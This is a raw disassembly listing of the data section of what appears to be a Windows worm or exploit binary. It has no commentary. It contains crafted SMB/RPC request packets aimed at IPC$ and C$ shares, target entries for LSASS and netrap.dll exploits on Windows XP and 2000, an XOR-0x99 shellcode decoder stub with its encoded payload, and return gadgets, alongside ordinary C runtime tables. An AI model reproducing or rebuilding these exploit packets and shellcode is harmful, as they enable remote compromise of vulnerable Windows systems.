dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_42CCB8 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_412F21+2E2�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_42CD28 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_412F21+307�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_42CDA0 dd 0 ; DATA XREF: sub_412F21+32C�o
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 2 dup(0)
word_42CE28 dw 0AD9Dh ; DATA XREF: sub_412DDE+2A�r
; sub_412F21+CC�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_42CE68 dd 1004600h ; DATA XREF: sub_412F21+10C�r
; sub_412F21+223�r
dd 1
aWin2kProfessio db 'Win2k Professional [universal] netrap.dll',0
align 10h
dd 0
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
; ---------------------------------------------------------------------------
loc_42CF20: ; DATA XREF: .text:00413643�o
; .text:004136C1�o
jmp short loc_42CF32
; =============== S U B R O U T I N E =======================================
sub_42CF22 proc near ; CODE XREF: sub_42CF22:loc_42CF32�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_42CF2A: ; CODE XREF: sub_42CF22+C�j
xor byte ptr [edx+ecx], 99h
loop loc_42CF2A
jmp short loc_42CF37
; ---------------------------------------------------------------------------
loc_42CF32: ; CODE XREF: .data:loc_42CF20�j
call sub_42CF22
loc_42CF37: ; CODE XREF: sub_42CF22+E�j
jo short near ptr dword_42CEA4+2Ah
cwde
cdq
cdq
retn
sub_42CF22 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
word_42CFD0 dw 4B9Dh ; DATA XREF: .text:00413624�w
dw 59AAh
dd 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh, 66CAC9C9h
dd 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h, 10627B17h
dd 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h, 0AACFC989h
dd 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h, 0C8C9A5DEh
dd 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h, 591C3559h
dd 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h, 66677671h
dd 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh, 0F8FCEBDAh
dd 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h, 0F8FCEBF1h
dd 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h, 0AAC6ABEAh
dd 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h, 0F0F599FDh
dd 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh, 0FAF6EAFCh
dd 99EDFCF2h, 0
dword_42D0B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:004137EE�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_42D148 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413820�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows20002_0:
unicode 0, <Windows 2000 2195>,0
aWindows20005_1:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_42D1F8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041384B�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_42D2D8 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0041358E�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_5: ; DATA XREF: .text:004135D1�o
unicode 0, <C$>,0
a?????_0 db '?????',0
align 10h
dword_42D340 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004138A3�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_42D3B0 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:004138CE�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_42D458 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413902�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_42D4D8 dd offset loc_401495 ; DATA XREF: .text:00413932�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_42D570 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413964�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_42D5E0 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:00413989�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_42D658 dd 0 ; DATA XREF: .text:004139AE�o
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 0
dd offset loc_40A899+1
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfess_0 db 'WinXP Professional [universal] lsass.exe ',0
align 8
dword_42D718 dd 1004600h ; DATA XREF: .text:00413693�r
; .text:004136A9�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 3 dup(0)
dd 9875h, 9873h
off_42D7A8 dd offset sub_414D2D ; DATA XREF: sub_415D8B�r
dd offset nullsub_1
dd offset nullsub_1
align 10h
dword_42D7C0 dd 19930520h, 3 dup(0) ; DATA XREF: sub_41586D+2�o
; sub_415876+2�o
off_42D7D0 dd offset sub_415ED4 ; DATA XREF: sub_4160D0+1C�r
dword_42D7D4 dd 2 ; DATA XREF: sub_41B3F9+50�r
; sub_41B570+E�r ...
off_42D7D8 dd offset aNull_1 ; DATA XREF: sub_416492:loc_416858�r
; sub_416492+4E4�r
; "(null)"
off_42D7DC dd offset aNull ; DATA XREF: sub_416492+2AC�r
; "(null)"
dword_42D7E0 dd 2 ; DATA XREF: sub_416C27+5�r
; sub_416C27+16�w ...
align 10h
dd 43h, 0
dword_42D7F8 dd 1, 8 dup(0) ; DATA XREF: sub_4179BC+AF�o
; .data:off_42D84C�o
dd 2 dup(1), 3 dup(0)
dd offset off_42E1D4
align 10h
dd offset word_4290B2
dd offset off_42E118
dd 0
off_42D84C dd offset dword_42D7F8 ; DATA XREF: sub_41471A+A�r
; sub_414F66+1C�r ...
dd 0
dd 1, 8 dup(0)
dd 43h, 21h dup(0)
dd 43h, 21h dup(0)
off_42D988 dd offset dword_47C9C0 ; DATA XREF: sub_417D6B+52�o
; sub_417E28+4�o ...
align 10h
dd offset dword_47C9C0
dd 101h
dword_42D998 dd 0FFFFFFFFh, 0 ; DATA XREF: sub_417D6B+71�o
dd 1000h, 0
dword_42D9A8 dd 3 dup(0) ; DATA XREF: sub_4162EB+53�o
; sub_41A95C+12�o
dd 2, 0FFFFFFFFh, 3 dup(0)
dword_42D9C8 dd 3 dup(0) ; DATA XREF: sub_4162EB+5B�o
; sub_41A95C:loc_41A97A�o
dd 2, 0FFFFFFFFh, 7 dup(0)
dword_42D9F8 dd 7Ch dup(0) ; DATA XREF: sub_417D6B+9D�o
dword_42DBE8 dd 8 dup(0) ; DATA XREF: sub_417E28+D�o
; sub_417E7A+D�o
dword_42DC08 dd 10h, 0 ; DATA XREF: sub_417D6B+67�o
off_42DC10 dd offset dword_47C228 ; DATA XREF: sub_417F83:loc_417FC0�w
; sub_417FCC+8�o ...
dword_42DC14 dd 1 ; DATA XREF: sub_417F83:loc_417F8C�r
; ---------------------------------------------------------------------------
inc eax
retn 47h
; ---------------------------------------------------------------------------
dd 1, 2 dup(0)
; ---------------------------------------------------------------------------
pop eax
retn 47h
; ---------------------------------------------------------------------------
dd 1, 47C270h, 1, 2 dup(0)
dd offset dword_47C288
dd 1, 47C2A0h, 1, 47C2B8h, 1, 2 dup(0)
dd offset dword_47C2D0
dd 1, 2 dup(0)
dd offset dword_47C2E8
dd 1, 47C300h, 1, 47C318h, 1, 2 dup(0)
dd offset dword_47C330
dd 1, 47C348h, 1, 47C360h, 1, 22h dup(0)
dword_42DD30 dd 1 ; DATA XREF: sub_417FCC+2A�o
; sub_417FCC+4A�o ...
dword_42DD34 dd 16h ; DATA XREF: sub_419442+3B�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
off_42DE98 dd offset sub_419999 ; DATA XREF: sub_414CF5+5�w
; sub_416492+43E�r
off_42DE9C dd offset sub_419613 ; DATA XREF: sub_414CF5+A�w
; sub_416492+46A�r
off_42DEA0 dd offset sub_419678 ; DATA XREF: sub_414CF5+14�w
; sub_416D3B+40D�r
off_42DEA4 dd offset sub_4195D7 ; DATA XREF: sub_414CF5+1E�w
; sub_416492+459�r
off_42DEA8 dd offset sub_41965E ; DATA XREF: sub_414CF5+28�w
off_42DEAC dd offset sub_419999 ; DATA XREF: sub_414CF5+32�w
off_42DEB0 dd offset word_4290B2 ; DATA XREF: sub_41507A:loc_41514C�r
; sub_416492:loc_416691�r ...
off_42DEB4 dd offset word_4292BA ; DATA XREF: sub_41F743+18�r
dword_42DEB8 dd 0BD4FF0C5h ; DATA XREF: sub_415289+6�r
; sub_416492+9�r ...
dd offset loc_41E13F
off_42DEC0 dd offset sub_41A89F ; DATA XREF: sub_41A8D4+C�r
align 10h
byte_42DED0 db 1 ; DATA XREF: sub_41AC67+C8�r
db 2, 4, 8
align 8
dword_42DED8 dd 3A4h ; DATA XREF: sub_41AC67:loc_41AC8C�r
dword_42DEDC dd 82798260h ; DATA XREF: sub_41AC67+104�r
dd 21h, 0
dword_42DEE8 dd 0DFA6h ; DATA XREF: sub_41AC67+A8�r
align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_42DFC8 dd 2 ; DATA XREF: sub_41B3F9:loc_41B417�r
; sub_41B3F9+32�r
off_42DFCC dd offset aR6002FloatingP ; DATA XREF: sub_41B3F9+DE�r
; sub_41B3F9+11B�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 429844h, 9, 429818h, 0Ah, 429780h, 10h, 429754h
dd 11h, 429724h, 12h, 429700h, 13h, 4296D4h, 18h, 42969Ch
dd 19h, 429674h, 1Ah, 42963Ch, 1Bh, 429604h, 1Ch, 4295DCh
dd 78h, 4295CCh, 79h, 4295BCh, 7Ah, 4295ACh, 0FCh, 4219D0h
dd 0FFh, 42959Ch
dword_42E058 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_416C45+41�o
; sub_416CB6+47�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_42E0D0 dd 3 ; DATA XREF: sub_41B5A9+84�r
; sub_41B5A9+A3�r ...
dword_42E0D4 dd 7 ; DATA XREF: sub_41B5A9+8A�r
; sub_41B5A9+A9�r ...
dd 78h
dword_42E0DC dd 0Ah ; DATA XREF: sub_41B5A9+14�r
; sub_41EE65�r
dword_42E0E0 dd 0FFFFFFFFh, 0A80h, 7 dup(0) ; DATA XREF: sub_4162EB:loc_4163AB�o
; sub_418C09:loc_418C8F�o
dword_42E104 dd 1 ; DATA XREF: sub_416D3B:loc_4173B6�r
byte_42E108 db 2Eh ; DATA XREF: sub_416D3B:loc_417046�r
; sub_416D3B+329�r ...
align 4
dd 1, 42E118h, 0
off_42E118 dd offset aSun ; DATA XREF: .data:0042D844�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHhMmSs ; "HH:mm:ss"
dd 409h, 1, 0
dword_42E1D0 dd 2Eh ; DATA XREF: .data:off_42E1D4�o
off_42E1D4 dd offset dword_42E1D0 ; DATA XREF: sub_41C72A+15�r
; .data:0042D830�o ...
off_42E1D8 dd offset dword_47C4A8 ; DATA XREF: sub_41C72A+32�r
off_42E1DC dd offset dword_47C4A8 ; DATA XREF: sub_41C72A+4E�r
off_42E1E0 dd offset dword_47C4A8 ; DATA XREF: sub_41C789+1B�r
off_42E1E4 dd offset dword_47C4A8 ; DATA XREF: sub_41C789+38�r
off_42E1E8 dd offset dword_47C4A8 ; DATA XREF: sub_41C789+55�r
off_42E1EC dd offset dword_47C4A8 ; DATA XREF: sub_41C789+72�r
off_42E1F0 dd offset dword_47C4A8 ; DATA XREF: sub_41C789+8F�r
off_42E1F4 dd offset dword_47C4A8 ; DATA XREF: sub_41C789+AC�r
off_42E1F8 dd offset dword_47C4A8 ; DATA XREF: sub_41C789+C8�r
dd 2 dup(7F7F7F7Fh)
off_42E204 dd offset off_42E1D4 ; DATA XREF: sub_41C72A+B�r
; sub_41C72A+27�r ...
align 10h
dd 1, 3 dup(0)
dword_42E220 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_41D9C1�o
dword_42E238 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh, 7080h, 1, 0FFFFF1F0h
; DATA XREF: sub_41D9D7�o
dd 0
dword_42E260 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:0042E2E0�o
dword_42E2A0 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:0042E2E4�o
dd offset dword_42E260
dd offset dword_42E2A0
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 2 dup(0)
dword_42E370 dd 2 dup(0) ; DATA XREF: sub_41F30B+F�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_42E4D0 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_41F30B+26�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 5 dup(0)
dword_42E640 dd 0 ; DATA XREF: sub_4010CA+18�r
; sub_4017F1+CF�w ...
dword_42E644 dd 0 ; DATA XREF: sub_401967+218�r
; sub_401B9D+EE�w ...
dd 3E6h dup(0)
dword_42F5E0 dd 6 dup(0) ; DATA XREF: sub_401967+C0�o
; sub_401967+129�o ...
dword_42F5F8 dd 0 ; DATA XREF: sub_401141+31F�w
; sub_401141+35E�o
dword_42F5FC dd 0A2h dup(0) ; DATA XREF: sub_401141+2ED�o
dword_42F884 dd 41h dup(0) ; DATA XREF: sub_401141+2BF�o
dword_42F988 dd 0 ; DATA XREF: sub_401141+2E1�w
; sub_401141+30C�r
align 10h
dword_42F990 dd 0 ; DATA XREF: sub_401141:loc_401495�w
; sub_401141+370�r
dword_42F994 dd 0 ; DATA XREF: sub_401141+312�w
dword_42F998 dd 0 ; DATA XREF: sub_401141+324�w
dword_42F99C dd 0 ; DATA XREF: sub_401141+2F2�w
dd 0
dword_42F9A4 dd 0 ; DATA XREF: sub_401141:loc_4014FB�r
dword_42F9A8 dd 0 ; DATA XREF: sub_401141+1AD�w
; sub_401141+215�r ...
dword_42F9AC dd 41h dup(0) ; DATA XREF: sub_401141+16A�o
dword_42FAB0 dd 41h dup(0) ; DATA XREF: sub_401141+193�o
dword_42FBB4 dd 0 ; DATA XREF: sub_401141+245�w
; sub_401141+261�r
dword_42FBB8 dd 0 ; DATA XREF: sub_401141+171�w
dword_42FBBC dd 0 ; DATA XREF: sub_401141+17D�w
; sub_401141+20F�r
dword_42FBC0 dd 20h dup(0) ; DATA XREF: sub_401141+1C8�o
; sub_401141+1FA�o
dword_42FC40 dd 0 ; DATA XREF: sub_401141+1B8�w
dword_42FC44 dd 0 ; DATA XREF: sub_401141+1D2�w
; sub_401141+204�w
dword_42FC48 dd 0 ; DATA XREF: sub_401141:loc_4013D2�r
align 10h
dword_42FC50 dd 0 ; DATA XREF: sub_401141+82�w
; sub_401141+102�o
dword_42FC54 dd 41h dup(0) ; DATA XREF: sub_401141+46�o
dword_42FD58 dd 41h dup(0) ; DATA XREF: sub_401141+68�o
dword_42FE5C dd 0 ; DATA XREF: sub_401141+F8�w
; sub_401141+114�r
dword_42FE60 dd 0 ; DATA XREF: sub_401141+52�w
dword_42FE64 dd 0 ; DATA XREF: sub_401141+4D�w
; sub_401141+CF�r
dword_42FE68 dd 20h dup(0) ; DATA XREF: sub_401141+9D�o
; sub_401141+BA�o
dword_42FEE8 dd 0 ; DATA XREF: sub_401141+8D�w
dword_42FEEC dd 0 ; DATA XREF: sub_401141+A7�w
; sub_401141+C4�w
dword_42FEF0 dd 0 ; DATA XREF: sub_401141:loc_401327�r
align 8
dword_42FEF8 dd 1000h dup(0) ; DATA XREF: sub_401EFF+1D�o
; sub_401F9F�o ...
dword_433EF8 dd 0Dh dup(0) ; DATA XREF: sub_401EFF+13�o
; sub_401F9F+E�o ...
dword_433F2C dd 0 ; DATA XREF: sub_402E5D+C2�o
dword_433F30 dd 200h dup(0) ; DATA XREF: sub_403338+D5�o
; sub_4034D6+97�o ...
dword_434730 dd 0 ; DATA XREF: sub_4031AF+35�r
; sub_4031AF+65�r ...
dword_434734 dd 0 ; DATA XREF: sub_4035FB+4F�r
; sub_40368D+53�r ...
dword_434738 dd 200h dup(0) ; DATA XREF: sub_403338+EC�o
; sub_4034D6+AE�o ...
dword_434F38 dd 0 ; DATA XREF: sub_4031AF+94�r
; sub_40378E+85�w
dword_434F3C dd 0 ; DATA XREF: sub_4031AF+A2�r
; sub_40378E+92�w
dword_434F40 dd 0 ; DATA XREF: sub_4031AF+D6�r
; sub_4031AF+173�r ...
dword_434F44 dd 0 ; DATA XREF: sub_4035FB+5�r
; sub_4035FB+2F�r ...
dword_434F48 dd 0 ; DATA XREF: sub_403338+172�w
; sub_4034D6+FF�w
dword_434F4C dd 0 ; DATA XREF: sub_403338+177�w
; sub_4034D6+105�w ...
dword_434F50 dd 0 ; DATA XREF: sub_403338+150�w
; sub_4035FB+49�r
align 8
dword_434F58 dd 80h dup(0) ; DATA XREF: sub_4035FB+58�o
dword_435158 dd 80h dup(0) ; DATA XREF: sub_40368D+35�o
dword_435358 dd 0 ; DATA XREF: sub_403AF0+2A�w
; sub_403AF0+51�r ...
dword_43535C dd 0 ; DATA XREF: sub_401B9D+67�r
; sub_403BFF+6A�w ...
byte_435360 db 0 ; DATA XREF: sub_40532B+11E�w
; sub_40532B+220�o
align 2
word_435362 dw 0 ; DATA XREF: sub_40532B+12B�w
word_435364 dw 0 ; DATA XREF: sub_40532B+136�w
word_435366 dw 0 ; DATA XREF: sub_40532B+13F�w
byte_435368 db 0 ; DATA XREF: sub_40532B+145�w
